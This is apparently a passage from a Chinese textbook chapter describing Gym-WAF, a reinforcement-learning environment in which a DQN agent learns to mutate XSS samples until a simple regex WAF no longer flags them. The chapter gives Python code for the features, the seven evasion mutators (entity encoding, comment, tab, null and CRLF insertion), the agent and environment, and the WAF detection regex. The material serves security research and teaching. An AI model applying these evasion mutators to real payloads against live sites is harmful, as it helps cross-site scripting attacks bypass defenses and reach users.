Gym-WAF基于OpenAI Gym和Keras-rl开发,主要由DQNAgent,WafEnv_v0,Waf_Check,Xss_Manipulator和Features组成。如图11-2所示,Features将XSS样本转换成向量,Waf_Check基于规则用于XSS检测,XSS的特征向量作为状态传递。DQNAgent基于当前状态和一定的策略,选择免杀动作。WafEnv_v0根据免杀动作,通过Xss_Manipulator针对XSS样本执行免杀操作,然后使用Features重新计算特征,再使用Waf_Check判断,如果不是XSS,反馈10并结束本轮学习;如果是XSS,反馈0以及新状态给DQNAgent,DQNAgent继续选择下一步免杀操作,如此循环。下面我们将介绍每个组件的具体原理和实现。
图11-2 Gym-WAF架构
Features类负责将字符串形式的XSS攻击样本提取特征,转换成机器学习模型可以使用的向量。最简单的一种实现就是把字符串转换成字节直方图,即Byte Histogram。把字符串转换成字节数组,然后统计每个字符出现的次数,这样可以有效地区分不同字符的组成情况。同时为了避免出现次数最多的字符对模型的不利影响,我们增加一个维度代表字符串长度,同时使用该长度对所有字节出现的次数取平均值,代码如下:
def byte_histogram(self,str): bytes=[ord(ch) for ch in list(str)] h = np.bincount(bytes, minlength=256) return np.concatenate([ [h.sum()], h.astype(self.dtype).flatten() / h.sum(), ])
通过字节直方图和字符串长度,我们得到了一个257维的特征向量:
def extract(self,str): featurevectors = [ [self.byte_histogram(str)] ] return np.concatenate(featurevectors)
Xss_Manipulator类实现了针对XSS样本的免杀操作,定义对应的转换表ACTION_TABLE,代码如下:
ACTION_TABLE = { 'charTo16': 'charTo16', 'charTo10': 'charTo10', 'charTo10Zero': 'charTo10Zero', 'addComment': 'addComment', 'addTab': 'addTab', 'addZero': 'addZero', 'addEnter': 'addEnter', }
其中,重要的参数介绍如下。
1.charTo16
charTo16函数实现了随机将标签内容中的字符转换成对应的十六进制编码。charTo16随机选择字符,将该字符转换成对应的十六进制,并且格式类似a,然后进行替换,随机替换1~3次,代码如下:
def charTo16(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: modify_char=random.choice(matchObjs) #字符转ascii值ord(modify_char modify_char_16="&#{};".format(hex(ord(modify_char))) #替换 str=re.sub(modify_char, modify_char_16, str,count=random.randint(1,3)) return str
2.charTo10
charTo10函数实现了随机将标签内容中的字符转换成对应的十进制编码。charTo10随机选择字符,将该字符转换成对应的十进制,并且格式类似a,然后进行替换,代码如下:
def charTo10(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: modify_char=random.choice(matchObjs) #字符转ascii值ord(modify_char #modify_char_10=ord(modify_char) modify_char_10="&#{};".format(ord(modify_char)) #替换 str=re.sub(modify_char, modify_char_10, str) return str
3.charTo10Zero
charTo10Zero与charTo10功能类似,唯一不同的是十进制的数字前面增加了几个0字符,代码如下:
def charTo10Zero(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: modify_char=random.choice(matchObjs) #字符转ascii值ord(modify_char modify_char_10="�{};".format(ord(modify_char)) #替换 str=re.sub(modify_char, modify_char_10, str) return str
4.addComment
addComment函数实现了随机向标签内容中增加注释的功能。addComment随机选择字符,在该字符后面增加注释,注释的内容可以随机,也可以设置成固定内容,代码如下:
def addComment(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_comment = "{}/*8888*/".format(modify_char) #替换 str=re.sub(modify_char, modify_char_comment, str) return str
5.addTab
addTab函数实现了随机向标签内容中增加TAB的功能。addTab随机选择字符,将该字符前面增加Tab,代码如下:
def addTab(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_tab=" {}".format(modify_char) #替换 str=re.sub(modify_char, modify_char_tab, str) return str
6.addZero
addZero函数实现了随机向标签内容中增加\0的功能。addZero随机选择字符,将该字符前面增加\0,代码如下:
def addZero(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_zero="\\00{}".format(modify_char) #替换 str=re.sub(modify_char, modify_char_zero, str) return str
7.addEnter
addEnter函数实现了随机向标签内容中增加回车的功能。addEnter随机选择字符,将该字符前面增加回车,代码如下:
def addEnter(self,str,seed=None): matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I) if matchObjs: #选择替换的字符 modify_char=random.choice(matchObjs) #生成替换的内容 modify_char_enter="\\r\\n{}".format(modify_char) #替换 str=re.sub(modify_char, modify_char_enter, str) return str
8.modify
modify实现了使用函数名称的字符串访问函数的功能,如图11-3所示,modify需要和ACTION_TABLE和ACTION_LOOKUP配合使用,代码如下:
def modify(self,str, _action, seed=6): print "Do action :%s" % _action action_func=Xss_Manipulator().__getattribute__(_action) return action_func(str,seed)
图11-3 通过动作序号执行函数的流程图
DQNAgent具体实现了强化学习算法,关于DQN的详细介绍请参考本书第6章的内容,本章主要介绍在Gym-WAF中如何使用DQNAgent。
首先定义创建深度学习网络的函数,input_shape代表输入的特征向量的维度,layers代表深度学习网络的各层层数,nb_actions代表动作空间的大小,由于在本例中动作空间是有限的离散值,所以nb_actions事实上也就是动作的个数,同时也是深度学习网络输出层节点数。这里深度学习网络使用的是多层感知机(MLP),所以直接指定层数即可,本例中建议使用两层隐藏层,节点数分别为5和2,代码如下:
def generate_dense_model(input_shape, layers, nb_actions): model = Sequential() model.add(Flatten(input_shape=input_shape)) model.add(Dropout(0.1)) for layer in layers: model.add(Dense(layer)) model.add(BatchNormalization()) model.add(ELU(alpha=1.0)) model.add(Dense(nb_actions)) model.add(Activation('linear')) return model
然后我们初始化Gym环境,获取环境env的动作空间大小:
ENV_NAME = 'Waf-v0' env = gym.make(ENV_NAME) nb_actions = env.action_space.n window_length = 1
创建DQNAgent的深度学习网络:
model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions)
创建策略对象policy,这里使用的是玻尔兹曼算法:
policy = BoltzmannQPolicy()
创建记忆体,大小为256:
memory = SequentialMemory(limit=256, ignore_episode_boundaries=False, window_length=window_length)
创建DQNAgent对象agent,指定使用的深度学习网络、动作空间大小、记忆体,使用的策略和批处理大小等参数:
agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16,enable_double_dqn=True,enable_dueling_network=True, dueling_type='avg',arget_model_update=1e-2, policy=policy, batch_size=16)
编译agent中的深度学习网络并开始学习,学习的总步数为rounds,其中非常重要的一个参数是nb_max_episode_steps,设置它主要是为了保证在学习过程中有一种退出机制,如果超过阈值可以自动退出,避免在一轮学习中因为异常情况一直学习,影响其他轮学习,代码如下:
agent.compile(RMSprop(lr=1e-3), metrics=['mae']) agent.fit(env, nb_steps=rounds, visualize=False, verbose=2,nb_max_episode_steps=nb_max_episode_steps_train)
WafEnv_v0类基于OpenAI Gym框架,实现了强化学习中环境的主要功能。WafEnv_v0在初始化阶段加载了XSS样本文件,并且随机划分成了训练样本和测试样本,其测试样本占40%,代码如下:
samples_file="xss-samples-all.txt" samples=[] with open(samples_file) as f: for line in f: line = line.strip('\n') print "Add xss sample:" + line samples.append(line) # 划分训练和测试集合 samples_train, samples_test = train_test_split(samples, test_size=0.4)
定义了动作转换表ACTION_LOOKUP:
ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}
初始化了动作空间、当前样本、获取特征的对象features_extra、用于检测XSS的waf_checker以及用于修改样本的xss_manipulatorer,代码如下:
self.action_space = spaces.Discrete(len(ACTION_LOOKUP)) #当前处理的样本 self.current_sample="" self.features_extra=Features() self.waf_checker=Waf_Check() #根据动作修改当前样本免杀 self.xss_manipulatorer= Xss_Manipulator()
涉及的重要的函数介绍如下。
1.Step
Step函数根据输入的动作序号,针对当前的样本进行修改,然后再检测是否是XSS,如果不是XSS,说明免杀成功,回馈10,标记此轮学习完成;反之反馈0,继续学习,代码如下:
def _step(self, action): r=0 is_gameover=False _action=ACTION_LOOKUP[action] self.current_sample= self.xss_manipulatorer.modify(self.current_sample,_action) if not self.waf_checker.check_xss(self.current_sample): #给奖励 r=10 is_gameover=True print "Good!!!!!!!avoid waf:%s" % self.current_sample self.observation_space=self.features_extra.extract(self.current_sample) return self.observation_space, r,is_gameover,{}
2.Reset
Reset函数负责重置环境,从样本列表中随机选择一个作为当前样本,并转换成对应的特征向量,作为初始状态,代码如下:
def _reset(self): self.current_sample=random.choice(samples_train) print "reset current_sample=" + self.current_sample self.observation_space=self.features_extra.extract(self.current_sample) return self.observation_space
Waf_Check类实现了针对字符串的XSS检测功能。Waf_Check在初始化函数里面定义了检测规则,该规则是一个非常简单的实现,有兴趣的读者可以参考11.2节“常见XSS防御方式”自行丰富,代码如下:
self.regXSS=r'(prompt|alert|confirm|expression])' \ r'|(javascript|script|eval)' \ r'|(onload|onerror|onfocus|onclick|ontoggle|onmousemove|ondrag)' \ r'|(String.fromCharCode)' \ r'|(;base64,)' \ r'|(onblur=write)' \ r'|(xlink:href)' \ r'|(color=)'
Waf_Check类通过check_xss函数针对字符串进行检测,如果满足规则就识别为XSS,整个匹配过程都是忽略大小写的,代码如下:
def check_xss(self,str): isxss=False #忽略大小写 if re.search(self.regXSS,str,re.IGNORECASE): isxss=True return isxss